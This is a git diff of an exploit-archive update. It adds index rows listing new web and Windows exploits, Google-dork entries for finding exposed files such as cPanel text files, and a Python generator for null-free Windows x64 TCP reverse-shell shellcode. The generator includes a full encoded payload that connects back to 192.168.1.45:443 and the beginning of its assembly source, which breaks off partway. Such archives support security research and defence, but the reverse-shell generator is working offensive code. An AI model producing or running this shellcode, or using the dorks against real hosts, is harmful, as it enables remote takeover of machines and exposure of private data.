51723,exploits/php/webapps/51723.txt,"Drupal 10.1.2 - web-cache-poisoning-External-service-interaction",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
21863,exploits/php/webapps/21863.txt,"Drupal 4.0 - News Message HTML Injection",2002-09-25,das@hush.com,webapps,php,,2002-09-25,2012-10-09,1,CVE-2002-1806;OSVDB-59300,,,,,https://www.securityfocus.com/bid/5801/info
22940,exploits/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting",2003-07-21,"Ferruh Mavituna",webapps,php,,2003-07-21,2012-11-27,1,,,,,,https://www.securityfocus.com/bid/8235/info
1088,exploits/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,webapps,php,,2005-07-04,2016-05-25,1,OSVDB-17647;CVE-2005-2106,,,,http://www.exploit-db.comdrupal-4.5.3.zip,
@ -21962,6 +21965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
6955,exploits/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,webapps,php,,2008-11-01,,1,OSVDB-49511;CVE-2008-6269,,,,,
45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-11,1,CVE-2018-15918,"SQL Injection (SQLi)",,http://www.exploit-db.com/screenshots/idlt45500/45340.png,,
45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80,2018-09-06,2018-09-06,0,CVE-2018-15917,"Cross-Site Scripting (XSS)",,,,
51715,exploits/php/webapps/51715.txt,"Jorani v1.0.3-(c)2014-2023 - XSS Reflected & Information Disclosure",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",webapps,php,,2014-02-21,2015-12-29,1,OSVDB-104937,,,,,https://www.securityfocus.com/bid/66377/info
8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,webapps,php,,2009-05-19,,1,OSVDB-61537,,,,,
5091,exploits/php/webapps/5091.pl,"Journalness 4.1 - 'last_module' Remote Code Execution",2008-02-09,Iron,webapps,php,,2008-02-08,2016-11-14,1,OSVDB-40596;CVE-2007-5056,,,,http://www.exploit-db.comJournalness_4.1_Full.tar.gz,
@ -30003,6 +30007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,webapps,php,,2007-03-10,,1,OSVDB-33986;CVE-2007-1425,,,,,
36196,exploits/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,webapps,php,,2011-10-02,2015-02-27,1,CVE-2011-5169;OSVDB-76185,,,,,https://www.securityfocus.com/bid/49906/info
2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",webapps,php,,2006-08-17,,1,OSVDB-28033;CVE-2006-4311,,,,,
51718,exploits/php/webapps/51718.txt,"soosyze 2.0.0 - File Upload",2023-09-08,nu11secur1ty,webapps,php,,2023-09-08,2023-09-08,0,,,,,,
41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,,
40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,,
42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,,
@ -30024,6 +30029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
51714,exploits/php/webapps/51714.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection",2023-09-08,CraCkEr,webapps,php,,2023-09-08,2023-09-08,0,CVE-2023-4548,,,,,
12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,,
12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,,
@ -32927,6 +32933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php,,2012-11-09,2015-08-30,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/56479/info
17284,exploits/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,webapps,php,,2011-05-14,2011-05-14,0,,"WordPress Plugin",,,http://www.exploit-db.comeditormonkey.tar.gz,
20270,exploits/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",webapps,php,,2012-08-05,2012-08-05,0,OSVDB-84462,"WordPress Plugin",,,,
51716,exploits/php/webapps/51716.txt,"Wordpress Plugin Elementor 3.5.5 - Iframe Injection",2023-09-08,"Miguel Santareno",webapps,php,,2023-09-08,2023-09-08,0,CVE-2022-4953,,,,,
50882,exploits/php/webapps/50882.py,"WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)",2022-04-19,AkuCyberSec,webapps,php,,2022-04-19,2022-04-22,0,,,,,,
37356,exploits/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",webapps,php,,2012-06-07,2015-06-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53850/info
43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,,2018-01-24,2018-01-24,1,,,,,http://www.exploit-db.comemail-subscribers.3.4.7.zip,
@ -33913,6 +33920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
51717,exploits/php/webapps/51717.py,"Wp2Fac - OS Command Injection",2023-09-08,"Ahmet Ümit BAYRAM",webapps,php,,2023-09-08,2023-09-08,0,,,,,,
51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@ -34680,7 +34688,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-09-08,1,,,,,,
40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
51276,exploits/python/webapps/51276.go,"modoboa 2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@ -38682,6 +38690,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,,2017-10-27,2018-03-02,0,,,,,,
43453,exploits/windows/dos/43453.py,"Sync Breeze Enterprise 10.1.16 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,,2018-01-08,2018-01-08,0,CVE-2017-15664,,,,http://www.exploit-db.comsyncbreezesrv_setup_v10.1.16.exe,
44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,,2020-06-10,2020-06-10,0,,,,,,
51725,exploits/windows/dos/51725.py,"SyncBreeze 15.2.24 - 'login' Denial of Service",2023-09-08,"mohamed youssef",dos,windows,,2023-09-08,2023-09-08,0,,,,,,
41475,exploits/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",dos,windows,,2017-02-28,2017-02-28,0,CVE-2017-6371,,,,http://www.exploit-db.comsbbs316c.zip,
47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,,2020-01-20,2020-01-20,0,,,,,,
24940,exploits/windows/dos/24940.rb,"Sysax Multi Server 6.10 - SSH Denial of Service",2013-04-09,"Matt Andreko",dos,windows,,2013-04-09,2013-04-09,1,OSVDB-92081,,,,http://www.exploit-db.comsysaxserv_setup_6.10.msi,
@ -40135,6 +40144,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,local,windows,,2009-01-07,,1,,,,,http://www.exploit-db.comGOMPLAYERENSETUP_v2.0.12.EXE,http://secunia.com/advisories/23994
18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows,,2011-11-30,2011-11-30,1,CVE-2011-5162;OSVDB-33080;CVE-2007-0707,,,http://www.exploit-db.com/screenshots/idlt18500/18174.png,,
30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",local,windows,,2013-12-10,2013-12-10,1,CVE-2013-6356,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-10-at-64257-pm.png,,
51724,exploits/windows/local/51724.py,"GOM Player 2.3.90.5360 - Buffer Overflow (PoC)",2023-09-08,"Ahmet Ümit BAYRAM",local,windows,,2023-09-08,2023-09-08,0,,,,,,
14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-26,1,CVE-2010-3134;OSVDB-67539,,,,,
11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,local,windows,,2010-01-15,,1,,,,,http://www.exploit-db.comGoogleSketchUpWEN.exe,http://www.coresecurity.com/content/google-sketchup-vulnerability
963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14686;CVE-2005-1424,,,,,
@ -42945,6 +42955,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,remote,windows,21,2005-04-28,2011-04-28,1,OSVDB-14369;CVE-2005-0634,,,,http://www.exploit-db.comGolden_FTP_Server_Pro_v2.50.zip,
16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-5779;OSVDB-38282,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/27418/
4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,remote,windows,,2007-10-28,2016-10-20,1,OSVDB-38282;CVE-2007-5779,,,,http://www.exploit-db.comgom2163499.exe,
51719,exploits/windows/remote/51719.py,"GOM Player 2.3.90.5360 - Remote Code Execution (RCE)",2023-09-08,"M. Akil Gündoğan",remote,windows,,2023-09-08,2023-09-08,0,,,,,,
6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,remote,windows,22,2008-10-21,,1,OSVDB-49249;CVE-2008-4726,,,,,
16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,2380,2010-05-09,2011-03-07,1,CVE-2005-0768;OSVDB-14806,"Metasploit Framework (MSF)",,,,
883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,remote,windows,2380,2005-04-23,,1,,,,,,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -933,6 +933,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,,
51721,shellcodes/windows/51721.py,"Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)",2023-09-08,Senzee,,windows,476,2023-09-08,2023-09-08,0,,,,,,
13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
933 15136 shellcodes/windows/15136.cpp Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode 2010-09-27 Celil Ünüver windows 2010-09-27 2010-11-06 1
934 51390 shellcodes/windows/51390.asm Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode 2023-04-25 Nayani windows 2023-04-25 2023-04-25 0
935 51634 shellcodes/windows/51634.py Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes) 2023-07-28 Senzee windows 169 2023-07-28 2023-07-28 0
936 51721 shellcodes/windows/51721.py Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes) 2023-09-08 Senzee windows 476 2023-09-08 2023-09-08 0
937 13525 shellcodes/windows_x86/13525.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes) 2005-07-26 loco windows_x86 29 2005-07-25 1 http://shell-storm.org/shellcode/files/shellcode-388.php
938 13526 shellcodes/windows_x86/13526.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) 2005-01-26 twoci windows_x86 31 2005-01-25 2018-01-21 1 http://shell-storm.org/shellcode/files/shellcode-387.php
939 13527 shellcodes/windows_x86/13527.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes) 2005-01-09 oc192 windows_x86 35 2005-01-08 2018-01-21 1 http://shell-storm.org/shellcode/files/shellcode-260.php

30
ghdb.xml
View file

@ -37668,6 +37668,21 @@ stag_1</textualDescription>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>8223</id>
<link>https://www.exploit-db.com/ghdb/8223</link>
<category>Files Containing Juicy Info</category>
<shortDescription>index of cpanel.txt</shortDescription>
<textualDescription># Google Dork: index of cpanel.txt
# Files Containing Juicy Info
# Date: 08/09/2023
# Author: Ved Kolambkar</textualDescription>
<query>new google dork</query>
<querystring>https://www.google.com/search?q=new google dork</querystring>
<edb></edb>
<date>2023-09-08</date>
<author>Ved Kolambkar</author>
</entry>
<entry>
<id>7025</id>
<link>https://www.exploit-db.com/ghdb/7025</link>
@ -49339,6 +49354,21 @@ Maxime Westhoven
<date>2019-10-18</date>
<author>Maxime Westhoven</author>
</entry>
<entry>
<id>8222</id>
<link>https://www.exploit-db.com/ghdb/8222</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.
# Files Containing Juicy Info
# Date: 08/09/2023
# Exploit Jannatul Adnin</textualDescription>
<query>My name is Jannatul Adnin and I would like to report a new Google dork.</query>
<querystring>https://www.google.com/search?q=My name is Jannatul Adnin and I would like to report a new Google dork.</querystring>
<edb></edb>
<date>2023-09-08</date>
<author>Jannatul Adnin</author>
</entry>
<entry>
<id>8118</id>
<link>https://www.exploit-db.com/ghdb/8118</link>

377
shellcodes/windows/51721.py Executable file
View file

@ -0,0 +1,377 @@
import ctypes, struct
import argparse
from keystone import *
# Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
# Exploit Author: Senzee
# Date: 08/29/2023
# Platform: Windows X64
# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763
# Test IP: 192.168.1.45
# Test Port: 443
# Payload size: 476 bytes
# NUll-Free: True
# Detailed information can be found at https://github.com/senzee1984/micr0_shell
# Generated Shellcode (192.168.1.45:443):
# Payload size: 476 bytes
# buf = b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x4c\x89\xcd\x41\xb8\x8e\x4e\x0e\xec\xe8\x8f\xff\xff"
# buf += b"\xff\x49\x89\xc4\x48\x31\xc0\x66\xb8\x6c\x6c\x50\x48\xb8\x57\x53\x32\x5f\x33\x32"
# buf += b"\x2e\x64\x50\x48\x89\xe1\x48\x83\xec\x20\x4c\x89\xe0\xff\xd0\x48\x83\xc4\x20\x49"
# buf += b"\x89\xc6\x49\x89\xc1\x41\xb8\xcb\xed\xfc\x3b\x4c\x89\xcb\xe8\x55\xff\xff\xff\x48"
# buf += b"\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec"
# buf += b"\x30\xff\xd0\x48\x83\xc4\x30\x49\x89\xd9\x41\xb8\xd9\x09\xf5\xad\xe8\x2b\xff\xff"
# buf += b"\xff\x48\x83\xec\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0"
# buf += b"\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd0\x49\x89\xc4\x48"
# buf += b"\x83\xc4\x30\x49\x89\xd9\x41\xb8\x0c\xba\x2d\xb3\xe8\xf3\xfe\xff\xff\x48\x83\xec"
# buf += b"\x20\x4c\x89\xe1\x48\x31\xd2\xb2\x02\x48\x89\x14\x24\x48\x31\xd2\x66\xba\x01\xbb"
# buf += b"\x48\x89\x54\x24\x02\xba\xc0\xa8\x01\x2d\x48\x89\x54\x24\x04\x48\x8d\x14\x24\x4d"
# buf += b"\x31\xc0\x41\xb0\x16\x4d\x31\xc9\x48\x83\xec\x38\x4c\x89\x4c\x24\x20\x4c\x89\x4c"
# buf += b"\x24\x28\x4c\x89\x4c\x24\x30\xff\xd0\x48\x83\xc4\x38\x49\x89\xe9\x41\xb8\x72\xfe"
# buf += b"\xb3\x16\xe8\x99\xfe\xff\xff\x48\xba\x9c\x92\x9b\xd1\x9a\x87\x9a\xff\x48\xf7\xd2"
# buf += b"\x52\x48\x89\xe2\x41\x54\x41\x54\x41\x54\x48\x31\xc9\x66\x51\x51\x51\xb1\xff\x66"
# buf += b"\xff\xc1\x66\x51\x48\x31\xc9\x66\x51\x66\x51\x51\x51\x51\x51\x51\x51\xb1\x68\x51"
# buf += b"\x48\x89\xe7\x48\x89\xe1\x48\x83\xe9\x20\x51\x57\x48\x31\xc9\x51\x51\x51\x48\xff"
# buf += b"\xc1\x51\xfe\xc9\x51\x51\x51\x51\x49\x89\xc8\x49\x89\xc9\xff\xd0"
def print_banner():
banner="""
"""
print(banner)
print("Author: Senzee")
print("Original Github Repository: https://github.com/senzee1984/micr0_shell")
print("Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode")
print("This version does not support shellcode execution")
print("Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n")
def get_port_argument(port):
port_hex_str = format(port, '04x')
port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
if "00" in {port_part_1, port_part_2}:
port += 257
port_hex_str = format(port, '04x')
port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
return f"mov dx, 0x{port_part_1 + port_part_2};\nsub dx, 0x101;"
return f"mov dx, 0x{port_part_1 + port_part_2};"
def get_ip_argument(ip):
ip_hex_parts = [format(int(part), '02x') for part in ip.split('.')]
reversed_hex = ''.join(ip_hex_parts[::-1])
if "00" in ip_hex_parts and "ff" not in ip_hex_parts:
hex_int = int(reversed_hex, 16)
neg_hex = (0xFFFFFFFF + 1 - hex_int) & 0xFFFFFFFF
return f"mov edx, 0x{neg_hex:08x};\nneg rdx;"
return f"mov edx, 0x{reversed_hex};"
def get_shell_type_argument(shell_type):
if shell_type == "cmd":
return f"mov rdx, 0xff9a879ad19b929c;\nnot rdx;"
return (f"sub rsp, 8;\nmov rdx, 0xffff9a879ad19393;\nnot rdx;\npush rdx;"
f"\nmov rdx, 0x6568737265776f70;")
def output_shellcode(lan,encoding,var,save):
sh = b""
for e in encoding:
sh += struct.pack("B", e)
shellcode = bytearray(sh)
print("[+]Payload size: "+str(len(encoding))+" bytes\n")
counter=0
if lan=="python":
print("[+]Shellcode format for Python\n")
sc = ""
sc = var+" = b\""
for dec in encoding:
if counter % 20 == 0 and counter != 0:
sc += "\"\n"+var+"+="+"b\""
sc += "\\x{0:02x}".format(int(dec))
counter += 1
if count % 20 > 0:
sc += "\""
print(sc)
elif lan=="c":
print("[+]Shellcode format for C\n")
sc = "unsigned char " + var + "[]={\n"
for dec in encoding:
if counter % 20 == 0 and counter != 0:
sc += "\n"
sc += "0x{0:02x}".format(int(dec))+","
counter += 1
sc=sc[0:len(sc)-1]+"};"
print(sc)
elif lan=="powershell":
print("[+]Shellcode format for Powershell\n")
sc = "[Byte[]] $"+var+" = "
for dec in encoding:
sc += "0x{0:02x}".format(int(dec))+","
sc=sc[0:len(sc)-1]
print(sc)
elif lan=="csharp":
print("[+]Shellcode format for C#\n")
sc = "byte[] " + var + "= new byte["+str(len(encoding))+"] {\n"
for dec in encoding:
if counter % 20 == 0 and counter != 0:
sc += "\n"
sc += "0x{0:02x}".format(int(dec))+","
counter += 1
sc=sc[0:len(sc)-1]+"};"
print(sc)
else:
print("Unsupported language! Exiting...")
exit()
if save=="true":
try:
with open(output, 'wb') as f:
f.write(shellcode)
print("\n\nGenerated shellcode successfully saved in file "+output)
except Exception as e:
print(e)
if __name__ == "__main__":
print_banner()
parser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.')
parser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45')
parser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443')
parser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell')
parser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf')
parser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd')
parser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False')
parser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.')
args = parser.parse_args()
ip=args.ip
port=int(args.port)
lan=args.lan.lower()
var=args.var
shell_type=args.shell_type.lower()
save=args.save.lower()
output=args.output
print("[+]Shellcode Settings:")
print("******** IP Address: "+ip)
print("******** Listening Port: "+str(port))
print("******** Language of desired shellcode runner: "+lan)
print("******** Shellcode array variable name: "+var)
print("******** Shell: "+shell_type)
print("******** Save Shellcode to file: "+save+"\n\n")
args = parser.parse_args()
port_argument = get_port_argument(port)
ip_argument = get_ip_argument(ip)
shell_type = get_shell_type_argument(shell_type)
CODE = (
"find_kernel32:"
" xor rdx, rdx;"
" mov rax, gs:[rdx+0x60];" # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
" mov rsi,[rax+0x18];" # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
" mov rsi,[rsi + 0x30];" # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure
" mov r9, [rsi];" # Current module is python.exe
" mov r9, [r9];" # Current module is ntdll.dll
" mov r9, [r9+0x10];" # Current module is kernel32.dll
" jmp jump_section;"
"parse_module:" # Parsing DLL file in memory
